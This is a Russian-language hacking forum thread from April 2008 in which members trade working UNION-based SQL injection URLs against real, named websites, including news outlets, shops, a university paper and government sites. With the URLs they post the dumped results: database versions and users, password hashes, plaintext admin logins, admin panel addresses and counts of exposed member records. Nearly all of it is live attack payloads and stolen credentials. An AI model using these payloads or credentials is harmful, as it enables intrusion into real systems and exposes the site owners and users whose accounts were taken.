SQL Инъекции

bag · 25 Apr 2008

Code:

http://www.whiznews.com/article.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,unhex(hex(concat_ws(0x3a,user,password))),4/**/from/**/mysql.user/*

root:*044222DB9218BC78AACACF7654EA2B53ABCA925F

Code:

http://www.sydneyroosters.com.au/news.php?ArticleID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4/**/from/**/mysql.user/*

root:*6CBD12C8F805CFADB394E65458C4D9664F1866C6
cms_admin:378b243e220ca493
testing1:4ab87db330cd6bd5
root:*019BBA7CE94D4959118549E98F475D38EA733DA5 - хз откуда второй root

Code:

http://www.chipdesignmag.com/display.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,unhex(hex(concat_ws(0x3a,user,password))),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/mysql.user/*

root:35976e334a7a830f
webadmin:48833ef87081f3cd

Code:

http://aainnovators.com/CMS/modules/wfsection/article.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/from/**/mysql.user+limit+0,1/*

admin:47fb196942cea04a

Code:

http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12/**/from/**/mysql.user/*

root:49c206e707168c98

Code:

http://www.prowrestlingfans.com/inc/printArticle.php?articleID=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11/**/from/**/mysql.user/*

root:*FA3D9981B584530E38A1BEB14DB9B74CB19FE4AE

Code:

http://www.snegohod-buran.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password)/**/from/**/mysql.user+limit+1,1/*

5fb4ffc22deb3e8c:vavaha

Code:

http://www.bike.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user,password),4/**/from/**/mysql.user+limit+0,1/*

root::

d_x · 25 Apr 2008

Имена, логины и пассы админов в открытом виде:

http://la2.ru/events/tournament/?id='%20union%20select%20name,concat(login, ':', pass)%20from%20admins/*

Админка тут: http://la2.ru/admin (у всех админов разные права)

CaNNabi$ · 25 Apr 2008

Postnuke Mod PostSchedule SQL Vuln

Code:

http://www.cpxsports.com/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

cpxAdmin:4fbf5fbba0800c1c0b6b7a33ff88155f

Code:

http://www.psp-vault.com/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

zmcnulty:ebf2de34b9c2b48b4abf5554816eb872

Code:

http://www.exactas.org/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

janus:bbcf33804c68e36630f938010413be58

Code:

http://www.lasvanskadolina.net/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

yadranko:cf9df8b725f3cd7607f30927a18d0bb2
yadranko:h5555yangtze

Code:

http://www.aifonline.it/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

adminworm:6730d9c3a47d9229d98cab97f2ddd089

Code:

http://www.frisktigers.no/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

Admin:0eb7e1f71974d5e5ae01a801d9395dfb
Admin:iceman

Code:

http://www.kaeferteamuenchen.de/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

hkoerber:5a3fc01488cb3a9e6e2ef4f87bb9daef

Code:

http://www.ungmor.dk/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

Admin:3b353f8d757cdf65c913f2711df7734a

Code:

http://www.wpi.pl/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

wpi:6141afd4bec62ee61428cf9cef93c08f

Joomla (com_filiale)

Code:

[B]http://www.brustart.be/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users
http://www.gimb.be/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users[/B]

Велемир · 25 Apr 2008

Поля в таблице Passwords

http://la2.ru/events/tournament/?id=-1'+union+select+column_name,2+from+information_schema.columns+where+table_name='passwords'/*

Окончательный список учёток и ниипёт:Р (Мошь надо кому было я хз,админки не тру)).Вот ток XSS там валется куча(или одна бальшая),так шо будьте бдительны:Р

http://la2.ru/events/tournament/?id=-1'+union+select+concat_ws(0x3a,pw_id,pw_account,pw_pass,pw_email),2+from+passwords/*

Saime · 25 Apr 2008

nerdpics.net

http://www.nerdpics.net/view.php?id='1
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9--
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9--
nerdpics@localhost:nerdpics:5.0.38-Ubuntu_0ubuntu1-log
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+column_name+LIKE%20/**/0x257061737325/**/--
user:Userassword
Click to expand...

159932 · 26 Apr 2008

www.policynetwork.net

http://www.policynetwork.net/main/article.php?article_id=-505+union+select+1,2,3,4,5,concat_ws(0x3a,admin_username,admin_password),7,8,9,0,1,2,3,4,5,6,7,8+from+admin/*
Click to expand...

4.0.20-standard-log
http://www.policynetwork.net/admin
kendra:v0nhayek
philip:v0nhayek
alec:v0nhayek
mark:v0nhayek
dawn:v0nhayek
marcsidwell:3rdfloor
caroline:v0nhayek
====================================================

www.practicalfishkeeping.co.uk

http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,administrator,pass)+from+emap.administrators+limit+0,1/*
Click to expand...

Matt Clarke:twolbperch
Jayne Phillips:ilovedavidsaxby
Rebecca Mee:iamthemanagerofpets
steve:hockey1
Bev Pearce:cheesywotsits
kate:ilikedatabases
Hannah:bluebellpub
Gareth:monkeyflaps
ian:forest
colleen:hockey

http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,id,directory_name,company_name,company_type,contact_name,job_title,contact_email,company_website,password)+from+emap.directory+limit+1145,1/*
Click to expand...

~1150 юзверей ..

http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,username,password)+from+practical_fishkeeping.members_details+limit+58111,1/*
Click to expand...

приличное кол-во юзверей .. ~ 58к ..

Saime · 26 Apr 2008

williampenn.net

http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
[email protected]:williampenn_db:5.0.45-log
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+login_table--
admin:wponline
Click to expand...

beerhack · 26 Apr 2008

http://www.oqbo.ru/read.php?block=-99999+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9/*

USER: [email protected]
VERSION: 5.0.45-log
DATABASE: u71738_oqbo

Есть табла
wp_users
~id
~user_login
~user_pass
~user_nicename
~user_email
~user_url
~user_registered
~user_activation_key
~user_status

но доступа к ней похоже нету

****************************************

http://pravostok.ru/ru/updates/index.php?from=10&id=-99999+union+select+1,2,concat_ws(0x3a,ADMINISTRATOR_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10,11,12,13,14+from+ADMINISTRATOR/*

USER: pravostok@localhost
VERSION: 5.0.42
DATABASE: pravostok

ADMINISTRATOR
~ADMINISTRATOR_ID
~FIO
~LOGIN
~PASSWORD_MD5
~EMAIL
~IS_ROOT
~IS_LOCKED
~COUNT_BAD_ENTER

1:admin:b25483fbb2b1ed77fafbb0e7f42d1ea4
2:editor:911eb63cdea3eb02445404c5ef07d043
3: o_petr:92aff5dbd2bbe06c649e869f2135c720
4:news_editor:5b1620f0fbe4d77dcd8038bdf452aa24
5:editnews:e41edc7ad7e486391503ab6b0d474681
6:editij:59cd9699950909b9279715a812a06689
7:editornews:1f1c14601393842f6ad32c4dd275e235
8:wwww:e34a8899ef6468b74f8a1048419ccc8b(wwww)

Одминка тут: http://pravostok.ru/adm/

XaCeRoC · 26 Apr 2008

l2world.uz

http://l2world.uz/dp/i-search.php?=1833&itemid=1833+union+%09select+version(),concat(user(),0x3a,user()),database(),4,5,6,7
Click to expand...

Можно ли залить шелл ??

neon_fx · 27 Apr 2008

http://refe.org.ua/news.php?id=-178+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/*

4.1.22-log

Nelzone · 27 Apr 2008

http://site.kz/index.php/newso/images/banners/news_unit.php?id=34658'
PostgreSQL

http://www.millionaireinyou.com/staff/view/?display=more&item_id=14'
PostgreSQL

http://arbitr.gov.ua/news.php?sub_section=2&news_id=9'
PostgreSQL

Zitt · 27 Apr 2008

http://www.wfsj.org/projects/page.php?id=-99999+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(USER(),%20%200x71),0x71),5,6,7,8,9,10,11/*

Kaimi · 27 Apr 2008

http://www.zemax.ru/rsochi/search.php?otype_s=1&district_s=9999999%20union+select+1,2,3,4,5,6,7,concat(user(),0x7c,version(),0x7c,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+users/*

neon_fx · 28 Apr 2008

http://www.blackbelt.com.ua/show.php?rand=1&id=-281+union+select+1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15+from+mysql.user/*

4.1.22-standard-log
root@localhost
mysql.user доступна
root
5c46cc0a0b8560de

http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,user(),version(),23,24,25/*

yegorkin_haty
[email protected]
5.0.45-community-log

.acme · 28 Apr 2008

http://www.renoise.com/songs.php?pg=styles&id=-1008+union+select+1,2,3,4,5,6,concat(COLUMN_NAME,0x2,TABLE_NAME),8,9,10,11,12,13,14,15,16,17+from+INFORMATION_SCHEMA.COLUMNS+limit+17,1--
Click to expand...

user: jdbc@localhost
db: renoise_db
version: 5.0.32-Debian_7etch5-log

.acme · 28 Apr 2008

http://www.s3m.com/dma/displayuser.php?user_id=-1224+union+select+1,2,3,4,concat_ws(0x4,user(),database(),version()),6,7,8,9,10,11,12,13,14,15--
Click to expand...

user: s3mcom_preylude@localhost
db: s3mcom_main
version: 4.1.22-standard

neon_fx · 29 Apr 2008

http://www.shoptop.kiev.ua/section.php?kat=6&subkat=-157+union+select+1,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

5.0.41-community-log
shoptop_user@localhost
shoptop_baze

/home/shoptop/domains/shoptop.kiev.ua/public_html/

на том же серваке :
http://www.bizcat.kiev.ua/section.php?kat=8&subkat=-157+union+select+1,2,3,4,version(),user(),user(),8,9,10%20,11,12,13,14,15,16,17,18,19,20,21/*

5.0.41-community-log
bizcat_user@localhost
/home/bizcat/domains/bizcat.kiev.ua/public_html/

http://www.bizcat.kiev.ua/section.php?kat=14&subkat=-130+union+select+1,2,3,4,version(),user(),7,8,9,10%20,11,12,13,14,15,16,17,18,19,20,21/*

http://free-board.com.ua/section.php?kat=9&subkat=-84+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.crm-expert.com.ua/section.php?id=-7+union+select+1,1,3,database()/*

crm
4.1.22-log

А®ТеS · 29 Apr 2008

http://www.kino.com/

http://www.kino.com/video/news.php?news_id=-
1+UNION+SELECT+1,2,3,4,5,6,VERSION()+from+login/*
Click to expand...

В Антибояне нет, что странно... PR 6.

.acme · 29 Apr 2008

А®ТеS, чуве, http://forum.antichat.ru/showpost.php?p=493477&postcount=3513

neon_fx · 29 Apr 2008

http://www.fzsk.gov.cn/show.php?id=182+or+1=@@Version
http://www.lfsfda.gov.cn/show.php?id=262+and+1=@@Version

SQL Инъекции

bag Elder - Старейшина

d_x Banned

CaNNabi$ Elder - Старейшина

Велемир Banned

Saime Member

159932 Elder - Старейшина

Saime Member

beerhack Elder - Старейшина

XaCeRoC Elder - Старейшина

neon_fx Elder - Старейшина

Nelzone Banned

Zitt Elder - Старейшина

Kaimi Well-Known Member

neon_fx Elder - Старейшина

.acme Elder - Старейшина

.acme Elder - Старейшина

neon_fx Elder - Старейшина

А®ТеS Active Member

.acme Elder - Старейшина

neon_fx Elder - Старейшина

Useful Searches

SQL Инъекции

bag Elder - Старейшина

d_x Banned

CaNNabi$ Elder - Старейшина

Велемир Banned

Saime Member

159932 Elder - Старейшина

Saime Member

beerhack Elder - Старейшина

XaCeRoC Elder - Старейшина

neon_fx Elder - Старейшина

Nelzone Banned

Zitt Elder - Старейшина

Kaimi Well-Known Member

neon_fx Elder - Старейшина

.acme Elder - Старейшина

.acme Elder - Старейшина

neon_fx Elder - Старейшина

А®ТеS Active Member

.acme Elder - Старейшина

neon_fx Elder - Старейшина